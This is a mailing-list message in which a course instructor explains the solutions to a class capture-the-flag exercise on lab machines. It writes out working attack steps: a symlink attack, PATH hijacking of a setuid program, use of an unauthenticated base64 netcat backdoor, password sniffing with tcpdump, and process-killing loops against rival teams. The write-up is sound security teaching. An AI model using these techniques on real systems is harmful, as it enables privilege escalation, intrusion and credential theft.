[cs615asa] CtF ended

Jin Sun jsun6 at stevens.edu
Tue May 6 01:23:51 EDT 2014


Sorry, I missed that line.
On May 6, 2014 1:21 AM, "Jin Sun" <jsun6 at stevens.edu> wrote:

> One thing I still want to know is: why can't leaky delete leaky.sh?
> On May 6, 2014 1:03 AM, "Jan Schaumann" <jschauma at stevens.edu> wrote:
>
>> Hello,
>>
>> The first ever CS615 Capture the Flag contest is officially over.  I
>> hope you enjoyed the exercise -- I certainly did have some fun setting
>> it up and seeing how you solved the problems.
>>
>> The following is a summary of the levels, what I hoped you might take
>> away from them, and what possible solutions I had in mind.
>>
>>
>> Level 0:
>>
>> As explained in class, it is useful to be able to send and receive
>> encrypted emails.  The online tutorials are simple enough and easy to
>> follow, and even if fully understanding all aspects of PGP might take
>> some time and practice, I hope you're all off to a good start and will
>> begin using it.
>>
>>
>> Level 1:
>>
>> As also discussed in class, you all were able to identify the checksum
>> as SHA256, and finding the right file was then just a matter
>> of iterating through the filesystem.  The starting point for your search
>> would have to have been ~jschauma on linux-lab, as local files on any
>> individual system would not have been available on the others.
>>
>> There were many different ways to do this; here's one:
>>
>> find ~jschauma -type f -exec sha256sum {} \; | grep <known sum>
>>
>>
>> Level 2:
>>
>> The URL you were given didn't show the right password, but the page's
>> HTML source included a hint to search for the sources of the
>> CGI.  Finding it in ~jschauma/cs_html/cgi-bin/ctf.cgi, you could then
>> inspect the source code, which included a commented out call to display
>> the file '/home/jschauma/cs_html/ctf/level-3'.
>>
>> That file was readable only by the 'www-data' user, the user that the
>> web server serving the site runs as.  Many of you easily found
>> that you could display that file simply by going to
>> http://www.cs.stevens.edu/~jschauma/ctf/level-3.
>>
>> Another solution (which none of you found) would have been to stage a
>> symlink attack, since ~jschauma/tmp/d (from which the CGI reads) was
>> set mode 777, meaning you could have created a symlink from
>> ~jschauma/tmp/d/nope -> ~jschauma/cs_html/ctf/level-3 and the CGI would
>> have displayed the passphrase.
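>>
>> A rough sketch of that attack (a sketch only; it assumes the CGI would
>> have displayed whatever file it found under ~jschauma/tmp/d, as
>> described above):
>>
>> ln -s ~jschauma/cs_html/ctf/level-3 ~jschauma/tmp/d/nope
>>
>> Since the CGI ran as 'www-data', it could follow the symlink, read the
>> otherwise unreadable file, and print the passphrase in its output.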
>>
>>
>> Level 3:
>>
>> Now things were getting a little bit more interesting.  The program you
>> were instructed to run did not display the passphrase you needed.  If
>> you looked around in the directory the program was in, then you might
>> have found a file that you were not able to read, as it was mode 0400
>> and owned by 'jschauma'.
>>
>> The program itself was setuid 'jschauma', and hence running with that
>> user's privileges.  Your task was to trick that program into executing a
>> command that would display the contents of the file in question.
>>
>> By running strace(1) or strings(1) or perhaps even by guessing, you
>> could have realized that the program invokes the id(1) command.  Since
>> the program just ran "id" instead of using an absolute path, all you
>> needed to do was create a script called "id" that did what you needed it
>> to do (for example: "cat /home/jschauma/ctf/whateverXXX"), add the
>> directory where that script is stored to the beginning of your PATH
>> variable and run the command again.
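>>
>> A minimal sketch of that approach; the setuid program's path below is a
>> placeholder, and the target file name is the example given above:
>>
>> mkdir -p "$HOME/bin"
>> cat > "$HOME/bin/id" <<'EOF'
>> #!/bin/sh
>> cat /home/jschauma/ctf/whateverXXX
>> EOF
>> chmod +x "$HOME/bin/id"
>> PATH="$HOME/bin:$PATH" /path/to/the/setuid/program
>>
>> When the program then invokes "id", it finds your script first in the
>> PATH and runs it with its elevated privileges.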
>>
>> Now one of the teams quickly realized that I had actually made a rather
>> fatal mistake here: since you could trick the command into running anything as
>> the user 'jschauma', you were actually able to run a full interactive
>> shell as me.  Clearly, I had not intended to allow you to do that, and I
>> appreciate that the team that found this reported it to me and then
>> removed the execute permissions from the program to avoid letting
>> somebody else exploit this.
>>
>> I changed the setup to use the 'www-data' account instead and then had
>> to change all my private credentials stored on Stevens systems (which,
>> fortunately, are few).  This was a good illustration of how tricky
>> it can get when you try to set up a vulnerability to be exploitable in
>> only one specific way.
>>
>> For those of you interested, remember that I have no special privileges
>> on linux-lab, and thus anything I can set up there, you could set up as
>> well.  How then did I manage to create an executable that was setuid
>> 'www-data'?  Think about it, and play around and see if you can
>> replicate the exercise yourself.
>>
>>
>> Level 4:
>>
>> You were given an ssh keypair.  It seems logical that the private key
>> would grant you access to the target system, but why did you receive the
>> public key?  In ssh key authentication, the public key is only needed on
>> the system you log in to, not on the system from which you
>> connect.
>>
>> The public key did contain a little bit of extra information, namely a
>> "from=" restriction.  As we've hinted at in one of our classes, ssh keys
>> can have a number of options that define what the connecting user can
>> do.  In this case, we can define the networks from which this key may be
>> used.
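>>
>> For reference, such a restriction is just an option prefixed to the key
>> on the server side; a hypothetical authorized_keys entry (the networks
>> and key material below are made up) might look like:
>>
>> from="203.0.113.0/24,10.10.0.0/16" ssh-rsa AAAAB3Nza...key... team@ctf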
>>
>> The networks given there were two of Amazon's EC2 networks as well as
>> a private network.  That is, the target system allowed ssh logins using
>> the private key from either of those EC2 networks as well as from the
>> internal network.
>>
>> After spinning up an EC2 instance to connect to the target system, you
>> might also have run into a problem where some OSes did not understand
>> the ssh key type, since they ship with an older version of OpenSSH.
>> Finally, you had to find out which port to connect to, since ssh on the
>> target system wasn't listening on the default port (22), but on another
>> port (2222).  A port scanner like nmap would have been able to show
>> this to you.
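>>
>> One way to find the port and then connect (a sketch; the key file name
>> is a placeholder, and the account name is taken from the example later
>> in this message):
>>
>> nmap -Pn -p- cs615-ctf.netmeister.org
>> ssh -p 2222 -i level4-key team@cs615-ctf.netmeister.org
>>
>> Here '-p-' asks nmap to scan all 65535 TCP ports, and '-Pn' skips host
>> discovery.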
>>
>> This was just a reminder that network services can be run on any port --
>> nothing says that ssh must always be on port 22, or that HTTP must
>> always be on port 80.  For example, if you had a firewall that only
>> allowed outgoing traffic to port 80, you could just run your ssh server
>> on that port to allow yourself to connect from within the firewalled
>> network.
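>>
>> As a sketch, that's just "Port 80" in the server's sshd_config, after
>> which clients connect with:
>>
>> ssh -p 80 user@host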
>>
>> Level 5:
>>
>> This level had a number of steps.  You knew you had to take control of
>> the web server's index page, which you could find under
>> /usr/pkg/share/httpd/htdocs/index.html.  But that file was owned by the
>> 'www' user.  You might have noticed that the time stamp on the file was
>> always recent: something was always updating it.
>>
>> Looking for the 'www' user's crontab in /var/cron/tabs/www, you could
>> have found the following entry:
>>
>> * * * * * /root/reset-site
>>
>> That is, 'www' was running the script /root/reset-site every minute.
>> That script contained a line that, depending on the method used to
>> display it, may have looked a bit odd.  If you used 'cat -v', you might
>> have seen:
>>
>> cp /var/tmp/d/^M/index.html /usr/pkg/share/httpd/htdocs/
>>
>> The script copied the file from a funky-looking directory to the website
>> root.  The directory name in question was "^M", which is the control
>> character used for a carriage-return.  (As discussed in an early
>> lecture, filenames can contain all sorts of characters, including
>> control characters.)
>>
>> You can enter the directory by typing Ctrl+V followed by the return key.
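>>
>> If you'd rather not type control characters interactively, you could
>> also have built the name with printf(1); note that command substitution
>> strips trailing newlines, but not a trailing carriage return:
>>
>> cd "$(printf '/var/tmp/d/\r')"
>> ls -la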
>>
>> The interesting thing about this directory (besides its name) is that it
>> had permissions 777.  That is (again, review our earlier lecture),
>> any user could create or remove files in that directory, regardless of
>> the permissions or ownership on the files themselves.
>>
>> That is, you could have initially taken control of the website by
>> removing the existing index.html file in this directory and instead
>> creating a new file with your contents, and the 'www' crontab would
>> always have copied that into place.
>>
>> That is, it was possible to capture the flag without gaining access to
>> the 'www' account.
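>>
>> A sketch of that initial takeover ('my-index.html' is a placeholder for
>> whatever content you wanted to serve):
>>
>> cd "$(printf '/var/tmp/d/\r')"
>> rm -f index.html
>> cp ~/my-index.html index.html
>>
>> Removing and replacing the file is allowed here because of the
>> directory's 777 permissions, regardless of who owns index.html itself.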
>>
>> Unfortunately, using this method any other team could obviously have
>> done the same thing, so you wouldn't have held on to
>> your victory for very long.  To avoid the flag being stolen, you'd have
>> to change the permissions on /usr/pkg/share/httpd/htdocs/index.html, for
>> which you'd need control of the 'www' account.
>>
>> As many of you found, there was an odd process running: 'nc6 -6 -l -e
>> /bin/64sh'.  Or perhaps you found that there was something listening on
>> port 6150, but only via IPv6.
>>
>> Looking at the manual page for nc6(1) and at the file /bin/64sh, you
>> would have found that there was a backdoor for the 'www' user that
>> required no authentication, and that would execute any command so long
>> as it was base64 encoded.  That is, you were able to run any command as
>> 'www' by, for example, running
>>
>> echo 'ls -l' | base64 | nc6 localhost 6150
>>
>> This would allow you to take control of the flag, to remove the crontab
>> that reset the site, to change permissions, etc.
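>>
>> For example (a sketch; exactly which permissions to tighten was up to
>> you):
>>
>> echo 'crontab -r' | base64 | nc6 localhost 6150
>> echo 'chmod 644 /usr/pkg/share/httpd/htdocs/index.html' | \
>>     base64 | nc6 localhost 6150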
>>
>> But of course another team could have also found that out, so your
>> defense would have to include a way to stop this.  Trying to kill the nc6
>> process should have proven futile, since it kept getting re-spawned.
>>
>> However, since the command only re-spawns after it terminates, and since
>> only a single connection to the port is possible, you could effectively
>> block others from using this backdoor by keeping open a network
>> connection.  However, you'd probably want to take care not to DoS
>> yourself and make it impossible for yourself to run any further
>> commands, should you need to.
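>>
>> A sketch of that blocking approach, keeping stdin open so the
>> connection doesn't close (run it under screen/tmux or with nohup so it
>> survives your logout):
>>
>> tail -f /dev/null | nc6 localhost 6150 &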
>>
>> Some of you also found other team members' ssh keys on linux-lab, which
>> were left unprotected.  This allowed them to access the target system as
>> the other team.  Some of the defenses put in place by team Blender
>> included changing the .login script to immediately log out the user
>> again, and an ongoing loop logging in as the other team and running
>> 'pkill -u <other team>'.
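>>
>> That loop could have been as simple as the following (a sketch; the
>> account name is a placeholder, and it assumes the other team's
>> unprotected key or password lets you log in):
>>
>> while true; do
>>     ssh otherteam@cs615-ctf.netmeister.org 'pkill -u otherteam'
>>     sleep 5
>> done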
>>
>> Neither of these defenses was 100% bulletproof: by manipulating the
>> .login file, interactive logins were made impossible, but the other team
>> could still run any command in a non-interactive ssh session (i.e. 'ssh
>> team@cs615-ctf.netmeister.org "some command"').  Secondly, the account
>> was only blocked whenever the 'pkill' command ran.  That is, there was a
>> race condition where the attacking team could have been able to log in
>> and run a command before the defending team could kill the command.
>> While complicated, the team could have then moved on to lock out the
>> attacker from at least this account by setting an alias for the kill
>> commands or finding another solution.
>>
>>
>> After the flag was taken, I made public a second backdoor: the 'leaky'
>> user.  The password for the user 'leaky' was stored as a TXT record in
>> the DNS (recall from our earlier class that the DNS can be used for more
>> than just hostname<->IP mappings):
>>
>> host -t TXT cs615-ctf.netmeister.org
>>
>> Once logged in as the 'leaky' user, you would have found the 'leaky'
>> executable, which was a setuid 'root' program that invoked a script that
>> submitted a file containing all users' passwords to a URL.  Since you
>> couldn't take control of the URL, you needed a different way to capture
>> the data.  There were two ways you could have done so:
>>
>> - tcpdump was setuid on cs615-ctf, so any user could have run it; you
>>   could run tcpdump while running the 'leaky' program and then see the
>>   data in the clear in your tcpdump output (a sketch follows after this
>>   list)
>>
>> - you could set up your own http endpoint and tell the script to send
>>   the data there
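>>
>> For the tcpdump variant, a sketch (this assumes the script submitted
>> the file over plain HTTP on port 80, and './leaky' stands in for
>> however you invoked the program):
>>
>> tcpdump -A -s 0 port 80 &
>> ./leaky
>>
>> The -A flag prints packet payloads as ASCII, so the submitted passwords
>> show up directly in the capture.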
>>
>> Having retrieved all the passwords, you'd be able to log in as every
>> user, change their passwords, disable their accounts, and lock the system
>> under your control.
>>
>> Team Blender also removed the 'leaky' program itself to prevent anybody
>> else from repeating the steps, but since we wanted to keep the game a
>> bit interesting, I re-created the program and then set the files to be
>> immutable ('chflags schg file'), so they couldn't be removed.
>>
>> Team Ramrod defended the flag by installing a cronjob for all users that
>> would kill their processes.  This runs every minute, meaning attackers
>> have a one-minute window to identify this method and remove the
>> crontab, after which they can change their password and continue
>> attacking from within.  Team Ramrod also neglected to change the
>> password of the 'www' account, leaving that as an attack vector, since
>> the 'leaky' account could not be disabled or its password changed.
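>>
>> Such an entry, installed into each of the other users' crontabs, might
>> have looked roughly like this (the username and signal are guesses):
>>
>> * * * * * pkill -9 -u victim-user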
>>
>> Here's how I prevented the 'leaky' user from changing its password,
>> while still allowing all other users to do so:
>>
>> # ls -l `which passwd`
>> -r-s---r-x  2 root  leaky  23987 Apr 13 06:48 /usr/bin/passwd
>>
>> That is, the 'leaky' user is in the 'leaky' group (its only member), and
>> I've changed the ownership on the passwd(1) command to that group and
>> removed group read/execute permissions.  Since Unix permissions are
>> granted left-to-right, so to speak ("Is the user the owner?  No; next:
>> is the user in the owning group?  Yes.  Do group permissions allow
>> execution? No."), users in
>> the 'leaky' group cannot execute the command, while other users can.
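>>
>> For the curious, the setup for that (done as root) was presumably along
>> these lines, with the mode read straight off the listing above:
>>
>> chgrp leaky /usr/bin/passwd
>> chmod 4505 /usr/bin/passwd
>>
>> Mode 4505 is setuid with r-x for the owner, no access for the group,
>> and r-x for everybody else.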
>>
>> However, one of you discovered a way around this limitation: after
>> logging in as 'leaky', and then switching to another user by way of
>> su(1), running the passwd(1) command will change the password of the
>> 'leaky' user.  This happens because passwd(1) identifies the default
>> username via the getlogin(2) system call, which retrieves the identity
>> as set at session login time and which does not change across
>> invocations of su(1).  (While this is not a bug, I did not consider this
>> behaviour and do find it at least "unexpected".)
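>>
>> Illustrated as a hypothetical session ('otheruser' is a placeholder):
>>
>> leaky$ su otheruser
>> Password:
>> otheruser$ passwd
>>
>> At this point passwd(1) offers to change the password for 'leaky'
>> rather than 'otheruser', because getlogin(2) still returns the name
>> used when the session was first established.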
>>
>>
>> And so the competition ends, together with the semester.  I will send
>> out and enter grades later this week or early next week.  You should
>> receive a reminder to fill out the course survey, as well.  Please
>> remember that course surveys are anonymous and I cannot see the
>> responses until after I have handed in the grades.  The more feedback
>> you provide, the better I will be able to improve the class for the next
>> year.
>>
>> Thanks, and best of luck in your further academic endeavours,
>>
>> -Jan
>>
>